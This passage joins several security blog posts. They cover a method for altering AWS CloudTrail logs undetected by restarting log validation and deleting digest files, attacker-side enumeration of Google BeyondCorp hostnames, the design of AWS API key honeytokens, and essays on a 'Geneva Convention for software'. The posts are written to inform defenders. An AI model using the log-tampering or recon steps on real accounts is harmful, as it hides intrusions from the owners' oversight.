At first glance this stops our modification attack in its tracks; our lambda modified the log after delivery, but the digest was computed on the contents prior to our changes. So the contents and the digest won't match.

Also covered by each digest file, is the previous digest file. This creates a chain of log validation starting at the present and going back up the chain into the past. If the previous digest file has been modified or is missing, the next digest file validation will fail (but subsequent digests will be valid.) The intent behind this is clear: log tampering should show that AWS command line log validation shows an error.

Chain of digests and files they cover
Contents of a digest file



It would seem that one option is to simply remove digest files, but S3 protects them and prevents deletion of files that are part of an unbroken digest chain.

There's an important caveat to be aware of though: when log validation is stopped and started on a Trail (as opposed to stopping and starting the logging itself), the log validation chain is broken in an interesting way. The next digest file that is delivered doesn't refer to previous digest file since validation was stopped and started. Instead, the next digest file references null as its previous file, as if it's a new digest chain starting afresh.

Digest file (red) that can be deleted following a stop-start
In the diagram above, after the log files in red were altered, log validation was stopped and started. This broke the link between digest 1 and digest 2.

Altered logs, successful validation

We said that S3 prevented digest file deletion on unbroken chains. However, older digest files can be removed so long as no other file refers to them. That means we can delete digest 1, then delete digest 0.

What this means is that on the previous log validation chain, we can now delete the latest digest entry file without failing any digest log validation. The log validation will start at the most recent chain, and move back up. When the validation encounters the first item on the previous chain, it simply moves on to the latest available item of the previous chain. (There may be a note about no log files being delivered for a period, but this is the same message that arrives when no log files are delivered as well.)

No complaints validity complaints about missing digest files

And now?

It's easy to imagine that log validation is simply included in automated system health-checks; so long as it doesn't fail, no one will be verifying logs.  Until they're needed, of course, at which point the logs could have been changed without validation producing an error condition.

This attack signature is: validation was stopped and started (rather than logging being stopped and started). It underscores the importance of alerting on CloudTrail updates, even if it doesn't stop logging. (One way would be to alert on UpdateTrail events using the AWS CloudWatch service.) A single validation stop and start event, means it is not a safe to assume that the AWS CLI tool reporting that all logs validate means that the logs haven't been tampered with. The log validation should be especially suspect if there are breaks in the digest validation chain, which would have to be manually verified.

Much like in the case of logs stored on a single compromised host, logs should be interpreted with care when we are dealing with compromised AWS accounts that had the power to alter them..

Farseeing: a look at BeyondCorp

$
0
0
This is the third post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.


Introduction

In our BlackHat talk, "Fighting the Previous War", we showed how attacks against cloud services and cloud-native companies are still in their nascent stages of evolution. The number of known attacks against AWS is small, which is at odds with the huge number (and complexity) of services available. It's not a deep insight to argue that the number of classes of cloud specific attacks will rise.

However, the "previous war" doesn't just refer to cloud stuff. While our talk primarily dealt with cloud services, we also spent some time on another recent development, Google's BeyondCorp. In the end, the results weren't exciting enough to include fully in the talk and so we cut slides from the presentation, but the original slides are in the PDF linked above.

In this post we'll provide our view on what BeyondCorp-like infrastructure means for attackers, and how it'll affect their approaches.

What is BeyondCorp?

We start with a quick overview of BeyondCorp that strips out less important details (Google has a bunch of excellent BeyondCorp resources if you've never encountered it before.)

In an ossified corporate network, devices inside the perimeter are more trusted than devices outside the perimeter (e.g. they can access internal services which are not available to the public Internet). In addition, devices trying to access those service aren't subject to checks on the device (such as whether the device is known, or is fully patched).

In the aftermath of the 2009 Aurora attacks on Google, where attackers had access to internal systems once the boundary perimeter was breached, Google decided to implement a type of Zero Trust network architecture. The essence of the new architecture was that no trust was placed in the location of a client regardless of whether the client was located inside a Google campus or sitting at a Starbucks wifi. They called it BeyondCorp.

Under BeyondCorp, all devices are registered with Google beforehand and all access to services is brokered through a single Access Proxy called ÜberProxy.

This means that all Google's corporate applications can be accessed from any Internet-connected network, provided the device is known to Google and the user has the correct credentials (including MFA, if enabled.)

Let's walk through a quick example. Juliette is a Google engineer sitting in a StarBucks leaching their Wifi, and wants to review a bug report on her laptop. From their documentation, it works something like this (we're glossing over a bunch of details):
  1. Juliette's laptop has a client certificate previously issued to her machine.
  2. She opens https://tickets.corp.google.com in her browser.
  3. The DNS response is a CNAME pointing to uberproxy.l.google.com (this is the Access Proxy). The hostname identifies the application.
  4. Her browser connects using HTTPS to uberproxy.l.google.com, and provides its client certificate. This identifies her device.
  5. She's prompted for credentials if needed (there's an SSO subsystem to handle this). This identifies her user.
  6. The proxy passes the application name, device identifier (taken from the client certificate), and credentials to the Access Control Engine (ACE).
  7. The ACE performs an authorization check to see whether the user is allowed to access the requested application from that device.
  8. The ACE has access to device inventory systems, and so can reason about device trust indicators such as:
    1. a device's patch level
    2. its trusted boot status
    3. when it was last scanned for security issues
    4. whether the user has logged in from this device previously
  9. If the ACE passes all checks, the access proxy allows the request to pass to the corporate application, otherwise the request fails.
Google's architecture diagrams include more components than we've mentioned above (and the architecture changed between their first and most recent papers on BeyondCorp). But the essence is a proxy that can reason about device status and user trust. Note that it's determining whether a user may access a given application, not what they do within those applications.

One particularly interesting aspect of BeyondCorp is how Google supports a bunch of protocols (including RDP and SSH) through the same proxy, but we won't look at that today. (Another interesting aspect is that Google managed to migrate their network architecture without interruption and is, perhaps, the biggest takeaway from their series of papers. It's an amazingly well planned migration.)

This sucks! (For attackers)

For ne'er-do-wells, this model changes how they go about their business. 

Firstly, tying authorisation decisions to devices has a big limiting effect on credential phishing. A set of credentials is useless to an external attacker if the authorisation decision includes an assertion that the device has previously been used by this user. Impersonation attacks like this become much more personal, as they require device access in addition to credentials.

Secondly, even if a beachhead is established on an employee's machine, there's no flat network to laterally move across. All the attacker can see are the applications for which the victim account had been granted access. So application-level attacks become paramount in order to laterally move across accounts (and then services).

Thirdly, access is fleeting. The BeyondCorp model actively incorporates updated threat information, so that (for example), particular browser versions can be banned en masse if 0days are known to be floating around. 

Fourthly, persistence on end user devices is much harder. Google use verified boot on some of their devices, and BeyondCorp can take this into account. On verified boot devices, persistence is unlikely to take the form of BIOS or OS-level functionality (these are costly attacks with step changes across the fleet after discovery, making them poor candidates). Instead, higher level client-side attacks seem more likely.

Fifthly, in addition to application attacks, bugs in the Access Control Engine or mistakes in the policies come into play, but these must be attacked blind as there is no local version to deploy or examine.

Lastly, targeting becomes really important. It's not enough to spam random @target.com addresses with dancingpigs.exe, and focus once inside the network. There is no "inside the network", at best you access someone's laptop, and can hit the same BeyondCorp apps as your victim.

A quick look at targeting

The lack of a perimeter is the defining characteristic of BeyondCorp, but that means anyone outside Google has a similar view to anyone inside Google, at least for the initial bits needed to bootstrap a connection.

We know all services are accessed through the ÜberProxy. In addition, every application gets a unique CNAME (in a few domains we've seen, like corp.google.com, and googleplex.com).

DNS enumeration is a well-mapped and frequently-trod path, and effective at discovering corporate BeyondCorp applications. Pick a DNS enumeration tool (like subrute), run it across the corp.google.com subdomain, and get 765 hostnames. Each maps to a Google Corporate application. Here's a snippet from the output:
  • [...]
  • pitch.corp.google.com
  • pivot.corp.google.com
  • placer.corp.google.com
  • plan.corp.google.com
  • platform.corp.google.com
  • platinum.corp.google.com
  • plato.corp.google.com
  • pleiades.corp.google.com
  • plumeria.corp.google.com
  • [...]
But DNS isn't the only place to identify BeyondCorp sites. As is the fashion these days, Google is quite particular about publishing new TLS certificates in the Certificate Transparency logs. These include a bunch of hostnames in  corp.google.com and googleplex.com. From these more BeyondCorp applications were discovered.

Lastly, we scraped the websites of all the hostnames found to that point and found additional hostnames referenced in some of the pages and redirects. For fun, we piped into PhantomJS and screencapped all the sites for quick review.

Results? We don't need no stinking results!


The end result of this little project was a few thousand screencaps of login screens:

Quite a few of these
Error showing my device isn't
allowed access to this service
Occasional straight 403


So, so many of these
Results were not exciting. The only site that was open to the Internet was a Cafe booking site on one of Google's campuses.

However, a few weeks ago a high school student posted the story of his bug bounty which appeared to involve an ÜberProxy misconfiguration. The BeyondCorp model explicitly centralises security and funnels traffic through proxy chokepoints to ease authN and authZ decisions. Like any centralisation, it brings savings but there is also the risk of a single issue affecting all applications behind the proxy. The takeaway is that mistakes can (and will) happen. 


So where does this leave attackers?

By no means is this the death of remote attacks, but it shifts focus from basic phishing attacks and will force attackers into more sophisticated plays. These will include more narrow targeting (of the BeyondCorp infrastructure in particular, or of specific endusers with the required application access), and change how persistence on endpoints is achieved. Application persistence increases in importance, as endpoint access becomes more fleeting.

With all this said, it's unlikely an attacker will encounter a BeyondCorp environment in the near future, unless they're targeting Google. There are a handful of commercial solutions which claim BeyondCorp-like functionality, but none rise to the same thoroughness of Google's approach. For now, these BeyondCorp attack patterns remain untested.

Canarytokens' new member: AWS API key Canarytoken

$
0
0
This is the fourth post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.

Introduction

In this blog post, we will introduce you to the newest member of our Canarytoken’s family, the Amazon Web Services API key token. This new Canarytoken allows you to sprinkle AWS API keys around and then notifies you when they are used. (If you stick around to the end, we will also share some of the details behind how we built it).

Background

Amazon Web Services offers a massive range of services that are easily integratable with each other. This encourages companies to build entire products and product pipelines using the AWS suite. In order to automate and manipulate AWS services using their API, we are given access keys which can be restricted by AWS policies. Access keys are defined on a per user basis which means there are a few moving parts in order to lock down an AWS account securely.

Take it for a spin - using an AWS API key Canarytoken

Using the AWS API key Canarytoken is as simple as can be. Simply make use of the free token server at http://canarytokens.org or use the private Canarytoken server built into your Canary console. Select the ‘AWS Keys’ token from the drop down list.



Enter an email and a token reminder (Remember: The email address is the one we will notify when the token is tripped, and the reminder will be attached to the alert. Choose a unique reminder, nothing sucks more than knowing a token is tripped, but being unsure where you left it). Then click on “Create my Canarytoken”.



You will notice that we arrange your credentials in the same way as the AWS console usually does, so you can get straight down to using (or testing) them. So lets get to testing. Click “Download your AWS Creds” and save the file somewhere you will find it.

For our tests, we are going to use the AWS Commandline tool (if you don’t have it yet, head over to http://docs.aws.amazon.com/cli/latest/userguide/installing.html). Below is a simple bash script that will leverage the AWS command line tool to create a new user named TestMePlease using your new-almost-authentic AWS API keys.

Simply go to your command line, navigate to the same location as the script and type, ./test_aws_creds.sh <access_key_id> <secret_access_key> . If all went to plan, you should be receiving an alert notifying you that your AWS API key Canarytoken was used.

NB: Due to the way these alerts are handled (by Amazon) it can sometimes take up to 20 minutes for the alert to come through.

Waiting...waiting...waiting(0-20mins later). Ah we got it!


Check...it...out! This is what your AWS API key Canarytoken alert will look like, delivered by email. The email will contain some useful details such as User Agent, Source IP and a reminder of where you may have placed this Canarytoken (we always assumed you not going to use only one! Why would you? They are free!!).

The simple plan then should be: Create a bunch of fake keys. Keep one on the CEO’s laptop. (He will never use it, but the person who compromises him will). Keep one on your webserver (again, no reason for it to be used, except by the guy who pops a shell on that box, etc)

Under the hood - steps to creating an AWS API key Canarytoken

The AWS API key Canarytoken makes use of a few AWS services to ensure that the Canarytoken is an actual AWS API key - indistinguishable from a real working AWS API key. This is important because we want to encourage attackers to have to use the key to find out how juicy it actually is - or isn’t. We also want this to be dead simple to use. Enter your details and click a button. If you want to see how the sausage is made, read on:


Creation - And on the 5th day…


The first service necessary for creating these AWS API key Canarytokens, is an AWS Lambda that is triggered by an AWS API Gateway event. Let’s follow the diagram’s flow. Once you click the ‘Create my Canarytoken’ button, a GET request is sent to the AWS API Gateway. This request contains query parameters for the domain (of the Canarytokens server), the username (if we want to specifiy one, otherwise a random one is generated) and the actual Canarytoken that will be linked to the created AWS API key. This is where the free version and commercial versions diverge slightly.

Our free version of Canarytokens (canarytokens.org), does not allow you to specify your own username for the AWS API key Canarytoken. The domain of the Canarytoken server is used in conjunction with the Canarytoken to create the AWS user on the account. (This is still completely useful, because the only way an attacker is able to obtain the username tied to the token, is to make an API call, and this call itself will trigger the alert). Our private Canary consoles enjoy a slightly different implementation. This uses an AWS Dynamo Database that links the users to their tokens and allowing clients the opportunity to specify what the user name for your AWS user should be. 

If the AWS API Gateway determines that sufficient information is included in the request, it triggers the lambda responsible for creating the AWS API key Canarytoken. This lambda creates a new user with no privileges on the AWS account, generates AWS API keys for that user and responds to the request with a secret access key and an access key id.


We should note that the newly created user has no permissions (to anything), so anyone with this AWS API key can’t do anything of importance. (Even if they did, its a user on our infrastructure, not yours!). Of course, before the attacker is able to find out how impotent her key is, she first has to use it and this is when we catch them out (detection time!).

Detection - I see you! 

Now that the AWS API key has been created and returned to the user, lets complete the loop and figure out when these AWS API keys are being used. The first service in our detection process, spoken about in our previous posts, is CloudTrail. CloudTrail is super useful when monitoring anything on an AWS account because it logs all important (not all) API calls recording the username, the keys used, the methods called, the user-agent information and a whole lot more. 

We configure CloudTrail to send its logs to another AWS logging service known as CloudWatch. This service allows subscriptions and filtering rules to be applied. This means that if a condition in the logs from CloudTrail is met in the CloudWatch service, it will trigger whichever service you configure it to - in our case another AWS Lambda function. In pure AWS terms, we have created a subscription filter which will send logs that match the given filter to our chosen lambda.

For the AWS API key Canarytoken, we use a subscription filter such as

  • "FilterPattern": "{$.userIdentity.type = IAMUser}"

This filter will check the incoming logs from CloudTrail and only send logs that contain the user identity as an IAM User - this is different from using root credentials as the user is then ‘root’.

Alert - Danger Will Robinson, danger!

All thats left now is for us to generate our Alert. We employ an AWS Lambda (again) to help us with this. This lambda receives the full log of the attempted AWS API call and bundles it into a custom HTTP Request that trips the Canarytoken. Our Canarytoken Server receives the request with all this information and relays the alert to you with all the information formatted neatly.

Summary - TLDR;

Amazon Web Services is a massive collection of easily integratable services which enables companies of all sizes to build entire products and services with relative ease. This makes AWS API keys an attractive target for many attackers.

The AWS API key Canarytoken allows the creation of real AWS API keys which can be strewn around your environment. An attacker using these credentials will trigger an alert informing you of his presence (and other useful meta information).. It’s quick, simple, reliable and a high quality indicator of badness.

A Geneva convention, for Software

$
0
0
The anti-pattern “X for Y” is a sketchy way to start any tech think piece, and with “cyber” stories guaranteeing eyeballs, you’re already tired of the many horrible articles predicting a “Digital Pearl Harbour” or “cyber Armageddon”. In this case however, we believe this article’s title fits and are going to run with it. (Ed’s note: So did all the other authors!)


The past 10 years have made it clear that the internet, (both the software that both powers it and the software that runs on top of it) are fair game for attackers. The past 5 years have made it clear that nobody has internalized this message as well as the global Intelligence Community. The Snowden leaks pulled back the curtains on massive Five Eyes efforts in this regard, from muted deals with Internet behemoths, to amusing grab-all efforts like grabbing still images from Yahoo webcam chats(1).


In response to these revelations, a bunch of us predicted a creeping Balkanization of the Internet, as more people became acutely aware of their dependence on a single country for all their software and digital services. Two incidents in the last two months have caused these thoughts to resurface: the NotPetya worm (2), and the accusations  against Kaspersky AV.


To quickly recap NotPetya: a mundane accounting package called M.E.Doc with wide adoption (in Ukraine) was abused to infect victims. Worms and Viruses are a dime a dozen, but a few things made NotPetya stand out. For starters, it used an infection vector repurposed from an NSA leak, It seemed to target Ukraine pretty specifically, and it had tangible side effects in the real world (Maersk shipping company reported loss upto  $200 million due to NotPetya (3)). What interested us most about NotPetya however was its infection vector. Having compromised the wide open servers of M.E.Doc, the attackers proceeded to build a malicious update for the accounting package. This update was then automatically downloaded and applied by thousands of clients. Auto-updates are common at this point, and considered good security hygiene, so it’s an interesting twist when the update itself becomes the attack vector.


The Kaspersky saga also touched on “evil updates” tangentially. While many in the US Intelligence Community have long looked down on a Russian AntiVirus company gaining popularity in the US, Kaspersky has routinely performed well enough to gain considerable market share. This came to a head in September this year when the US Dept. of Homeland Security (DHS) issued a directive for all US governmental departments to remove Kaspersky software from their computers (4). In the days that followed, a more intriguing narrative emerged. According to various sources, an NSA employee who was working on exploitation and attack tooling took some of his work home, where his home computer (running Kaspersky software) proceeded to slurp up his “tagged” files.


Like most things infosec, this has kicked off a distracting sub-drama involving Israeli, Russian and American cyber-spooks. Kaspersky defenders have come out calling the claims outrageous, Kaspersky detractors claim that their collusion with Russian intelligence is obvious and some timid voices have remained non-committal while waiting for more proof. We are going to ignore this part of the drama completely.


What we _do_ care about though is the possibility that updates can be abused to further nation state interests. The American claim that Russian Intelligence was pushing updates selectively to some of its users (turning their software into a massive, distributed spying tool) is completely feasible from a technical standpoint. Kaspersky has responded by publishing a plan for improved transparency, which may or may not maintain their standing with the general public. But that ignores the obvious fact that as with any software that operates at that level, a “non-malicious” system is just one update away from being “malicious”. The anti-Kasperskians are quick to point out that even if Kaspersky has been innocent until now, they could well turn malicious tomorrow (with pressure from the GRU) and that any assurances given by Kaspersky are dependent on them being “good” instead of being technical controls.


For us, as relative non-combatants in this war, the irony is biting. The same (mostly American) voices who are quick to float the idea of the GRU co-opting bad behaviour in  Russian companies claim that US based companies would never succumb to US IC pressure, because of the threat to their industry position should it come out. There is no technical control that’s different in the two cases; US defenders are betting that the US IC will do the “right thing”, not only today but also far into the future. This naturally leads to an important question: do the same rules apply if the US is officially (or unofficially) at war with another nation?


In the Second World War, Germany nationalized English assets located in Germany, and the British did likewise. It makes perfect sense and will probably happen during future conflicts too. But Computers and the Internet change this. In a fictitious war between the USA and Germany, the Germans could take over every Microsoft campus in the country, but it wouldn’t protect their Windows machines from a single malicious update propagated from Redmond. The more you think about this, the scarier it gets. A single malicious update pushed from Seattle could cripple huge pieces of almost every government worldwide. What prevents this? Certainly not technical controls. [Footnote: Unless you build a national OS like North Korea did, https://en.wikipedia.org/wiki/Red_Star_OS].


This situation is without precedent. That a small number of vendors have the capacity to remotely shutdown government infrastructure, or vacuum up secret documents, is almost too scary to wrap your head around. And that’s without pondering how likely they are to be pressured by their governments. In the face of future conflict, is the first step going to be disabling auto-updates for software from that country?


This bodes badly for us all; the internet is healthier when everyone auto-updates. When eco-systems delay patching, we are all provably worse off. (When patching is painful, botnets like Mirai take out innocent netizens with 620 Gbit/s of traffic (5)). Even just the possibilities  leads us to a dark place. South Korea owns about 30% of the phone market in the USA (and supplies components in almost all of them). Chinese factories build hardware and ship firmware in devices we rely on daily. Like it or not, we are all dependent on these countries behaving as good international citizens but have very little in terms of a carrot or a stick to encourage “good behavior”.


It gets even worse for smaller countries. A type of mutually assured technology destruction might exist between China and the USA, but what happens when you are South Africa? You don’t have a dog in that fight. You shovel millions and millions of dollars to foreign corporations and you hope like hell that it’s never held against you. South Africa doesn’t have the bargaining power to enforce good behavior, and neither does Argentina, or Spain, but together, we may.


An agreement between all participating countries can be drawn up, where a country commits to not using their influence over a local software company to negatively affect other signatories. Countries found violating this principle risk repercussions from all member countries for all software produced by the country. In this way, any Intelligence Agency that seeks to abuse influence over a single company’s software, risks all software produced by that country with all member countries. This creates a shared stick that keeps everyone safer.


This clearly isn’t a silver bullet. An intelligence agency may still break into software companies to backdoor their software, and probably will. They just can’t do it with the company’s cooperation. Countries will have a central arbitrator (like the International Court of Justice) that will field cases to determine if IC machinations were done with or without the consent of the software company, and like the Geneva convention would still be enforceable during times of conflict or war.

Software companies have grown rich by selling to countries all over the world. Software (and the Internet) have become massive shared resources that countries the world over are dependent on. Even if they do not produce enough globally distributed software to have a seat at the table, all countries deserve the comfort of knowing that the software they purchase won’t be used against them. The case against Kaspersky makes it clear that the USA acknowledges this, as a credible threat and are taking steps to protect themselves. A global agreement, protects the rest of us too.

On anti-patterns for ICT security and international law

$
0
0
(Guest Post by @marasawr)
Author’s note : international law is hard, and these remarks are extremely simplified.
Thinkst recently published a thought piece on the theme of 'A Geneva Convention, for software.'[1] Haroon correctly anticipated that I'd be a wee bit crunchy about this particular 'X for Y' anti-pattern, but probably did not anticipate a serialised account of diplomatic derpitude around information and communications technologies (ICT) in international law over the past twenty years. Apparently there is a need for this, however, because this anti-pattern is getting out of hand.
Microsoft President and Chief Legal Officer Brad Smith published early in 2017 on 'The need for a digital Geneva Convention,' and again in late October on 'What the founding of the Red Cross can teach us about cyber warfare.'[2] In both cases, equivalences are drawn between perturbations in the integrity or availability of digital services, and the circumstances which prompted ratification of the Fourth Geneva Convention, or the circumstances prompting the establishment of the ICRC. And this is ridiculous.

Nation-state hacking is not a mass casualty event

The Fourth Geneva Convention (GCIV) was drafted in response to the deadliest single conflict in human history. Casualty statistics for the Second World War are difficult, but regardless of where in the range of 60-80 million dead a given method of calculation falls, the fact remains that the vast majority of fatalities occurred among civilians and non-combatants. The Articles of GCIV, adopted in 1949, respond directly to these deaths as well as other atrocities and deprivations endured by persons then unprotected by international law.[3] The founding of the ICRC was similarly prompted by mass casualties among wounded soldiers in European conflicts during the mid-nineteenth century.[4] But WannaCry was not Solferino; Nyetya was not the Rape of Nanjing.
Microsoft's position is, in effect, that nation-state hacking activities constitute an equivalent threat to civilian populations as the mass casualty events of actual armed conflict, and require commensurate regulation under international law. 'Civilian' is taken simply to mean 'non-government.' The point here is that governments doing government things cost private companies money; this is, according to Smith, unacceptable. Smith isn't wrong that this nation-state stuff impacts private companies, but what he asks for is binding protection under international law against injuries to his bottom line. I find this type of magical thinking particularly irksome, because it is underpinned by the belief that a corporate entity can be apatride and sovereign all at once. Inconveniently for Microsoft, there is no consensus in the customary law of states on which to build the international legal regime of their dreams.
The Thinkst argument in favour of a Geneva Convention for software is somewhat less cynical. Without a common, binding standard of conduct, nation-states are theoretically free to coerce, abuse, or otherwise influence local software companies as and when they please. Without a common standard, the thinking goes, (civilian) software companies and their customers remain in a perpetual state of unevenly and inequitably distributed risk from nation-state interference. Without binding protections and a species of collective bargaining power for smaller economies, nation-states likewise remain unacceptably exposed.[5]
From this starting point, a binding resolution of some description for software sounds more reasonable. However, there are two incorrect assumptions here. One is that nothing of the sort has been previously attempted. Two is that nation-states, particularly small ones, have a vested interest in neutrality as a guiding principle of digital governance. Looking back through the history of UN resolutions, reports, and Groups of Governmental Experts (GGEs) on — please bear with me — 'Developments in the field of information and telecommunications in the context of international security,’ it is clear this is not the case.[6] We as a global community actually have been down this road, and have been at it for almost twenty years.

International law, how does it work?

First, what are the Geneva Conventions, and what are they not?[7] The Geneva Conventions are a collection of four treaties and three additional protocols which comprise the body of international humanitarian law governing the treatment of non-combatant (i.e. wounded, sick, or shipwrecked armed forces, prisoners of war, or civilian) persons in wartime. The Geneva Conventions are not applicable in peacetime, with signatory nations agreeing to abide by the Conventions only in times of war or armed conflict. Such conflicts can be international or non-international (these are treated differently), but the point to emphasise is that an armed conflict with the characteristics of war (i.e. one in which human beings seek to deprive one another of the right to life) is a precondition for the applicability of the Conventions.
UN Member States which have chosen to become signatory to any or all of the Conventions which comprise international humanitarian law (IHL) and the Law of Armed Conflict (LOAC) have, in effect, elected to relinquish a measure of sovereignty over their own conduct in wartime. The concept of Westphalian sovereignty is core to international law, and is the reason internal conflicts are not subject to all of the legal restrictions governing international conflicts.[8] Just to make life more confusing, reasonable international law scholars disagree regarding which conventions and protocols are bucketed under IHL, which are LOAC, and which are both.
In any event, IHL and LOAC do not cease to apply in wartime because Internet or computers; asking for a separate Convention applicable to software presumes that the digital domain is currently beyond the scope of IHL and LOAC, which it is not. That said, Tallinn Manuals 1.0 and 2.0 do highlight some problem areas where characteristics of informatic space render transposition of legal principles presuming kinetic space somewhat comical.[9] IHL and LOAC cannot accommodate all eventualities of military operations in the digital domain without severe distortion to their application in kinetic space, but that is a protocol-sized problem, not a convention-sized problem. It is also a very different problem from those articulated by Microsoft.

19 years of ICT and international security at the UN

What Thinkst and Microsoft both point to is a normative behavioural problem, and there is some fascinating (if tragic) history here. Early in 2017 Michele Markoff appeared for the US Department of State on a panel for the Carnegie Endowment for International Peace, and gave a wonderfully concise breakdown of this story down from its beginnings at the UN in 1998.[10] I recommend watching the video, but summarise here as well.
In late September of 1998, the Permanent Representative to the UN for the Russian Federation, Sergei Lavrov, transmitted a letter from his Minister of Foreign Affairs to the Secretary-General.[11] The letter serves as an explanatory memorandum for an attached draft resolution seeking to prohibit the development, production, or use by Member States of ‘particularly dangerous forms of information weapons.’[12] The Russian document voices many anxieties about global governance and security related to ICT which today issue from the US and the EU. Weird, right? At the time, Russian and US understandings of ‘information warfare’ were more-or-less harmonised; the term encompassed traditional electronic warfare (EW) measures and countermeasures, as well as information operations (i.e. propaganda). Whether or not the Russian ask in the autumn of 1998 was sincere is subject to debate, but it was unquestionably ambitious. UN A/C.1/53/3 remains one of my favourite artefacts of Russia's wild ‘90s and really has to be read to be believed.
So what happened? The US did their level best to water down the Russian draft resolution. In the late 1990s the US enjoyed unassailable technological overmatch in the digital domain, and there was no reason to yield any measure of sovereignty over their activities in that space at the request of a junior partner (i.e. Russia). Or so the magical thinking went. The resolution ultimately adopted (unanimously, without a vote) by the UN General Assembly in December 1998 was virtually devoid of substance.[13] And it is that document which has informed the character of UN activities in the area of ‘Developments in the field of information and telecommunications in the context of international security’ ever since.[14] Ironically, the US and like-minded states have now spent about a decade trying to claw their way back to a set of principles not unlike those laid out in the original draft resolution transmitted by Lavrov. Sincere or not, the Russian overture of late 1998 was a bungled opportunity.[15]

State sovereignty vs digital governance

This may seem illogical, but the fault line through the UN GGE on ICT security has never been large vs small states.[16] Instead, it has been those states which privilege the preservation of national sovereignty and freedom from interference in internal affairs vs those states receptive to the idea that their domestic digital governance should reflect existing standards set out in international humanitarian and human rights law. And states have sometimes shifted camps over time. Remember that the Geneva Conventions apply in a more limited fashion to internal conflicts than they do to international conflicts? Whether a state is considering commitment to behave consistently with the spirit of international law in their internal affairs, or commitment to neutrality as a desirable guiding principle of digital governance, both raise the question of state sovereignty.
As it happens, those states which tend to aggressively defend the preservation of state sovereignty in matters of digital governance tend to be those which heavily censor or otherwise leverage their ICT infrastructure for the purposes of state security. In early 2015 Permanent Representatives to the UN from China, Kazakhstan, the Russian Federation, Tajikistan, and Uzbekistan sent a letter to the Secretary-General to the effect of ‘DON’T TREAD ON ME’ in response to proposed ’norms, rules, and principles for the responsible behaviour of States’ by the GGE for ICT security.[17] Armenia, Belarus, Cuba, Ecuador, Turkey, and other have similarly voiced concern in recent years that proposed norms may violate their state sovereignty.[18]
During the summer of 2017, the UN GGE for ICT security imploded.[19] With China and the Russian Federation having effectively walked away 30 months earlier, and with decades of unresolved disagreement regarding the relationship between state sovereignty, information, and related technologies... colour me shocked.

Hard things are hard

So, how do we safeguard against interference with software companies by intelligence services or other government entities in the absence of a binding international standard? The short answer is : rule of law.
Thinkt’s assertion that ‘there is no technical control that’s different’ between the US and Russian hypotheticals is not accurate. Russian law and lawful interception standards impose technical requirements for access and assistance that do not exist in the United States.[20] When we compare the two countries, we are not comparing like to like. Declining to comply with a federal law enforcement request in the US might get you a public showdown and fierce debate by constitutional law scholars, because that can happen under US law. It is nigh unthinkable that a Russian company could rebel in this manner without consequences for their operations, profitability, or, frankly, for their physical safety, because Russian law is equally clear on that point.
Software companies are not sovereign entities; they do not get to opt out of the legal regimes and geopolitical concerns of the countries in which they are domiciled.[21] In Kaspersky’s case, thinking people around DC have never been hung up on the lack of technical controls ensuring good behaviour. What we have worried about for years is the fact that the legal regime Kaspersky is subject to as a Russian company comfortably accommodates compelled access and assistance without due process, or even a warrant.[22] In the US case, the concern is that abuses by intelligence or law enforcement agencies may occur when legal authorisation is exceeded or misinterpreted. In states like Russia, those abuses and the technical means to execute them are legally sanctioned.
It is difficult enough to arrive at consensus in international law when there is such divergence in the law of individual states. But when it comes to military operations (as distinct from espionage or lawful interception) in the digital domain, we don’t even have divergence in the customary law of states as a starting point. Until states begin to acknowledge their activities and articulate their own legal reasoning, their own understandings of proportionate response, necessity, damage, denial, &c. for military electromagnetic and information operations, the odds of achieving binding international consensus in this area are nil. And there is not a lot compelling states to codify that reasoning at present. As an industry, information security tends to care about nation-state operations to the extent that such attribution can help pimp whatever product is linked below the analysis, and no further. With the odd exception, there is little that can be called rigorous, robust, or scientific about the way we do this. So long as that remains true – so long as information security persists in its methodological laziness on the excuse that perfect confidence is out of reach – I see no externalities which might hasten states active in this domain to admit as much, let alone volunteer a legal framework for their operations.
At present, we should be much more concerned with encouraging greater specificity and transparency in the legal logics of individual states than with international norms creation on a foundation of sand. The ‘X for Y’ anti-pattern deserves its eyerolls in the case of a Geneva Convention for software, but for different reasons than advocates of this approach generally appreciate.
-mara 

[1] Thinkst Thoughts, ‘A Geneva Convention, for software,’ 26 October 2017, http://blog.thinkst.com/2017/10/a-geneva-convention-for-software.html.
[2] Brad Smith, Microsoft On the Issues : ‘The need for a digital Geneva Convention,’ 14 February 2017, https://blogs.microsoft.com/on-the-issues/2017/02/14/need-digital-geneva-convention/; Brad Smith and Carol Ann Browne, LinkedIn Pulse : ‘What the founding of the Red Cross can teach us about cyber warfare,’ 29 October 2017, https://www.linkedin.com/pulse/what-founding-red-cross-can-teach-us-cyber-warfare-brad-smith/.
[3] See Jean S Pichet, Commentary : the Geneva Conventions of 12 August 1949, (Geneva : International Committee of the Red Cross, 1958), https://www.loc.gov/rr/frd/Military_Law/pdf/GC_1949-IV.pdf.
[4] See Jean S Pichet, Commentary : the Geneva Conventions of 12 August 1949, (Geneva : International Committee of the Red Cross, 1952), https://www.loc.gov/rr/frd/Military_Law/pdf/GC_1949-I.pdf.
[5] Groups of Governmental Experts (GGEs) are convened by the UN Secretary-General to study and develop consensus around questions raised by resolutions adopted by the General Assembly. When there is need to Do Something, but nobody knows or can agree on what that Something is, a GGE is established. Usually after a number of other, more ad hoc experts' meetings have failed to deliver consensus. For brevity we often refer to this GGE as 'the GGE for ICT security' or 'the GGE for cybersecurity'. https://www.un.org/disarmament/topics/informationsecurity/
[6] Thinkst Thoughts, ‘A Geneva Convention, for software,’ 26 October 2017, http://blog.thinkst.com/2017/10/a-geneva-convention-for-software.html.
[8] Regulating internecine conflict is extra hard, and also not very popular. See Protocol Additional to the Geneva Conventions of 12 August 1949, and relating to the Protection of Victims of Non-International Armed Conflicts (Protocol II), 8 June 1977.
